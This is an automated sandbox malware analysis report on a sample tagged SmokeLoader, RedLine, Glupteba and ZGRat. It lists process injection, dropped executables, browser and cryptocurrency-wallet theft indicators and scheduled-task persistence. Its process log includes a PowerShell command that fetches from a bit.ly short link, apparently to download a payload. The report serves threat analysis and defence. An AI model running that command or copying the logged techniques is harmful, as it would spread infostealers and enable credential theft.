Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-2b3rrsfde9
Target 0x00310000000142c9-42.dat
SHA256 2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Tags smokeloader redline livetraffic backdoor infostealer trojan glupteba zgrat 666 up3 dropper loader rat spyware stealer
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda

Threat Level: Known bad

The file 0x00310000000142c9-42.dat was found to be: Known bad.

Malicious Activity Summary

Glupteba payload

SmokeLoader

RedLine payload

ZGRat

Detect ZGRat V1

Smokeloader family

Glupteba

RedLine

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Deletes itself

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Unsigned PE

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 22:25

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 22:25

Reported

2023-12-18 22:27

Platform

win7-20231215-en

Max time kernel

34s

Max time network

41s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1260 wrote to memory of 2796 N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe
PID 1260 wrote to memory of 1680 N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

C:\Users\Admin\AppData\Local\Temp\9E23.exe

C:\Users\Admin\AppData\Local\Temp\9E23.exe

C:\Users\Admin\AppData\Local\Temp\C0A2.exe

C:\Users\Admin\AppData\Local\Temp\C0A2.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 22:25

Reported

2023-12-18 22:27

Platform

win10v2004-20231215-en

Max time kernel

56s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1608 set thread context of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe
PID 3552 wrote to memory of 1608 N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

C:\Users\Admin\AppData\Local\Temp\F7ED.exe

C:\Users\Admin\AppData\Local\Temp\F7ED.exe

C:\Users\Admin\AppData\Local\Temp\933.exe

C:\Users\Admin\AppData\Local\Temp\933.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\4071.exe

C:\Users\Admin\AppData\Local\Temp\4071.exe

C:\Users\Admin\AppData\Local\Temp\4CB7.exe

C:\Users\Admin\AppData\Local\Temp\4CB7.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp" /SL5="$200022,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\7474.exe

C:\Users\Admin\AppData\Local\Temp\7474.exe

Network


Files
